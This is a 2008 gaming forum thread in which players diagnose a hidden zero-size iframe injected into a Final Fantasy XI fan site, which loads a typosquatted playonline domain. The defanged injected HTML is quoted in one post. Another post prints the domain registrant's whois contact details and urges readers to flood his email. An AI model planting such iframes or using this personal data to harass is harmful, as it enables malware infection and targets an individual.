Item Search
     
BG-Wiki Search
+ Reply to Thread
Page 1 of 4 1 2 3 ... LastLast
Results 1 to 20 of 65
  1. #1
    Smells like Onions
    Join Date
    Dec 2007
    Posts
    5
    BG Level
    0
    FFXI Server
    Cerberus

    Is there an exploit on ffxi-atlas?

    Went to check out some logging points on atlas today and I got a new script that wanted to pass on noscripts called something like playoniline.com so i immediately got off the site and FFXI and then changed my password on another computer. Currently I'm searching for any kind of java exploits. Just wondering if anyone has seen this on that site.

  2. #2
    On the Couch
    Join Date
    Feb 2007
    Posts
    272
    BG Level
    4

    Re: Is there an exploit on ffxi-atlas?

    My anti-virus popped up with a warning about a script exploit that was blocked. It also looked to me like at least one of the news links was pointing to the mispelled playonline.com.

  3. #3
    Ive sucked 27 dicks, in a row.
    Join Date
    Apr 2006
    Posts
    1,570
    BG Level
    6

    Re: Is there an exploit on ffxi-atlas?

    This is hilarious in a very strange way. They put their iframe RIGHT AFTER the news link on the bottom saying "Link to ffxi.somepage.com appears to have been hacked".

    HTML source from the page, URL changed to prevent accidental entry:
    Code:
    <A HREF="/updates.php?act=show&go=2">Link to FFXI.somepage.com appears to have been hacked 
    
    <iframe src=hXXp://wwX.playonlnie.com/indxe.html width=0 height=0 frameborder=0></iframe></A></TD>

  4. #4
    New Odin
    Join Date
    Jul 2006
    Posts
    8,664
    BG Level
    8
    FFXIV Character
    Sparthia Abysseant
    FFXIV Server
    Excalibur
    FFXI Server
    Lakshmi

    Re: Is there an exploit on ffxi-atlas?

    Even RMT have a sense of humor?

  5. #5
    Smells like Onions
    Join Date
    Dec 2007
    Posts
    5
    BG Level
    0
    FFXI Server
    Cerberus

    Re: Is there an exploit on ffxi-atlas?

    I should be alright if noscript caught the iframe right?

  6. #6

    Re: Is there an exploit on ffxi-atlas?

    Is it just me or is this one a new one, not the previous realplayer hack?

    I've taken a look at the source of the exploit, and it seems like it might be trying a buffer overrun.

  7. #7
    On the Couch
    Join Date
    Feb 2007
    Posts
    272
    BG Level
    4

    Re: Is there an exploit on ffxi-atlas?

    Anyone know how to check to see if you've been infected? I visited ffxi-atlas.com on my laptop which I haven't used to play FFXI since then, but at some point I'm going to want to.

  8. #8
    I Am, Who I Am.
    Join Date
    Nov 2005
    Posts
    15,994
    BG Level
    9
    FFXIV Character
    Trixi Sephyuyx
    FFXIV Server
    Excalibur
    FFXI Server
    Ragnarok

    Re: Is there an exploit on ffxi-atlas?

    Just posted this in the sticky up top.

    Went to ffxi-atlas, and mcafee blocked a trojan coming from the google ads.

  9. #9
    Old Merits
    Join Date
    Apr 2006
    Posts
    1,006
    BG Level
    6

    Re: Is there an exploit on ffxi-atlas?

    big question is what KIND of exploit is it. i.e. Require realplayer? / Are firefox users safe / is noscript our only hope of salvation as the advancing RMT crush their opposition underfoot? / does the tinfoil hat really help? / IE users only, the civilized world is safe.

  10. #10
    Flameass
    Guest

    Re: Is there an exploit on ffxi-atlas?

    Whois of playonlnie.com.

    Fucking China!

    Code:
    Using username "a_va".
    a_va@login's password:
    Last login: Tue Mar 11 21:01:25 2008 from pavlov.encs.concordia.ca
    ==========================================================================
       Concordia University Faculty of Engineering and Computer Science
    
                 Unauthorized access is strictly forbidden.
    
    For assistance: e-mail: <[email protected]>
    For information:   web: http://www.encs.concordia.ca
    
    ==========================================================================
    [respect] [/home/a/a_va] > whois playonlnie.com
    [Querying whois.internic.net]
    [Redirected to whois.bizcn.com]
    [Querying whois.bizcn.com]
    [whois.bizcn.com]
    
    The data in this whois database is provided to you for information
    purposes only, that is, to assist you in obtaining information about or
    related to a domain name registration record. We make this information
    available "as is," and do not guarantee its accuracy. By submitting a
    whois query, you agree that you will use this data only for lawful
    purposes and that, under no circumstances will you use this data to: (1)
    enable high volume, automated, electronic processes that stress or load
    this whois database system providing you this information; or (2) allow,
    enable, or otherwise support the transmission of mass unsolicited,
    commercial advertising or solicitations via direct mail, electronic
    mail, or by telephone.  The compilation, repackaging, dissemination or
    other use of this data is expressly prohibited without prior written
    consent from us.  We reserve the right to modify these terms at any time.
    By submitting this query, you agree to abide by these terms.
    
    Domain name: playonlnie.com
    
    Registrant Contact:
       xu zi hao
       zi hao zi hao [email protected]
       13980647195 fax: 13980647195
       nei meng gu
       neimenggu NM 123456
       cn
    
    Administrative Contact:
       zi hao xu [email protected]
       13980647195 fax: 13980647195
       nei meng gu
       neimenggu NM 123456
       cn
    
    Technical Contact:
       zi hao xu [email protected]
       13980647195 fax: 13980647195
       nei meng gu
       neimenggu NM 123456
       cn
    
    Billing Contact:
       zi hao xu [email protected]
       13980647195 fax: 13980647195
       nei meng gu
       neimenggu NM 123456
       cn
    
    DNS:
    ns1.myhostadmin.net
    ns2.myhostadmin.net
    
    Created: 2008-01-12
    Expires: 2009-01-12
    [respect] [/home/a/a_va] >
    People should feel free to flood his gmail acct.

  11. #11
    New Odin
    Join Date
    Jul 2006
    Posts
    8,664
    BG Level
    8
    FFXIV Character
    Sparthia Abysseant
    FFXIV Server
    Excalibur
    FFXI Server
    Lakshmi

    Re: Is there an exploit on ffxi-atlas?

    They own about 90 domains, a ton of them are variations on playonline and microsoft.

  12. #12
    Jeny from the 'Rok
    Join Date
    Oct 2006
    Posts
    392
    BG Level
    4
    FFXI Server
    Lakshmi

    Re: Is there an exploit on ffxi-atlas?

    They are using the 0-day injection through a VML exploit.

  13. #13
    Old Merits
    Join Date
    Apr 2006
    Posts
    1,006
    BG Level
    6

    Re: Is there an exploit on ffxi-atlas?

    well, here's the fixes and patches for VML exploit.
    http://www.microsoft.com/technet/securi ... 6-055.mspx


    This should have been fixed years ago I thought, for anybody who keeps windows remotely up to date.
    Or is this a new form of the 0-day injection packet that breaks the code in a way the old stock MS fix didn't fix?

  14. #14
    blax n gunz
    Join Date
    May 2005
    Posts
    11,161
    BG Level
    9

    Re: Is there an exploit on ffxi-atlas?

    Quote Originally Posted by cassiraa
    This should have been fixed years ago I thought, for anybody who keeps windows remotely up to date.
    Or weeks ago, for anybody who reads stickies

    viewtopic.php?f=2&t=27256

  15. #15
    Old Merits
    Join Date
    Apr 2006
    Posts
    1,006
    BG Level
    6

    Re: Is there an exploit on ffxi-atlas?

    Quote Originally Posted by Correction
    Or weeks ago, for anybody who reads stickies
    http://www.bluegartr.com/forum/viewto ... =2&t=27256
    I do believe that the stickied page you referenced cites a Javascript Realplayer exploit. As I understand it the realplayer exploit does not use VML, but ActiveX.

    If this is a VML exploit, it will require different fixes than the ones previously dealt with.

    Are you saying 'this must be the same problem as was in the sticky?' or are you actually familiar with these exploits.



    VVV My comment is assuming Jeny is correct about VML, I can't check it here, but yea, Vista has no VML issues.

  16. #16
    Ridill
    Join Date
    Jun 2006
    Posts
    12,765
    BG Level
    9

    Re: Is there an exploit on ffxi-atlas?

    I was on atlas a few minutes before this thread was made. avg doesnt see anything, and that microsoft site doesnt list a vista fix (cause it's from '06). Vista already safe from the exploit?

  17. #17
    Jeny from the 'Rok
    Join Date
    Oct 2006
    Posts
    392
    BG Level
    4
    FFXI Server
    Lakshmi

    Re: Is there an exploit on ffxi-atlas?

    Quote Originally Posted by Souj
    I was on atlas a few minutes before this thread was made. avg doesnt see anything, and that microsoft site doesnt list a vista fix (cause it's from '06). Vista already safe from the exploit?
    It doesn't affect Vista. There's a post by Microsoft somewhere stating which OS are affected by it and which patches you can get for them... I'll try to find it.

    Quote Originally Posted by cassiraa
    VVV My comment is assuming Jeny is correct about VML, I can't check it here, but yea, Vista has no VML issues.
    This is what comes up on my XP Laptop using the latest IE.

    http://s7.photobucket.com/albums/y296/L ... tled-3.jpg

    and this is part of the actual code found in the iframe.

    http://s7.photobucket.com/albums/y296/L ... itled2.jpg

    Sorry about the shitty resolution on the shots, I'm playing Cabal Online and in no mood to open something other than paint.

  18. #18
    Smells like Onions
    Join Date
    Dec 2007
    Posts
    5
    BG Level
    0
    FFXI Server
    Cerberus

    Re: Is there an exploit on ffxi-atlas?

    Glad people found out some good information on this

    so since I have Vista and it was blocked with noscript, it shouldn't do anything to me right? just wanna make sure

  19. #19
    O_oPK
    Guest

    Re: Is there an exploit on ffxi-atlas?

    So, does anyone know if It installs stuff or adds a logger? If so, does anyone know where and what the name is?

  20. #20
    lettuce
    Join Date
    Jun 2007
    Posts
    106
    BG Level
    3
    FFXI Server
    Bismarck

    Re: Is there an exploit on ffxi-atlas?

    Actually my PC is up to date and I have IE7+Vista32 IE7 blocks a VML render graphic or something that is a ActiveX control. Since i have ActiveX stuff to prompt before running. The script itself didnt run. But Vista can run it, whether vunerable or not I don't know.

+ Reply to Thread
Page 1 of 4 1 2 3 ... LastLast

Similar Threads

  1. Replies: 257
    Last Post: 2009-10-16, 23:43
  2. Replies: 210
    Last Post: 2008-03-19, 03:02
  3. Resetting AF Quests: Is there a limit on # of times?
    By TsingTao in forum FFXI: Everything
    Replies: 2
    Last Post: 2007-01-04, 12:54
  4. is there anyway to make ffxi look better on pc ?
    By Evilvicious in forum FFXI: Everything
    Replies: 26
    Last Post: 2006-03-30, 01:46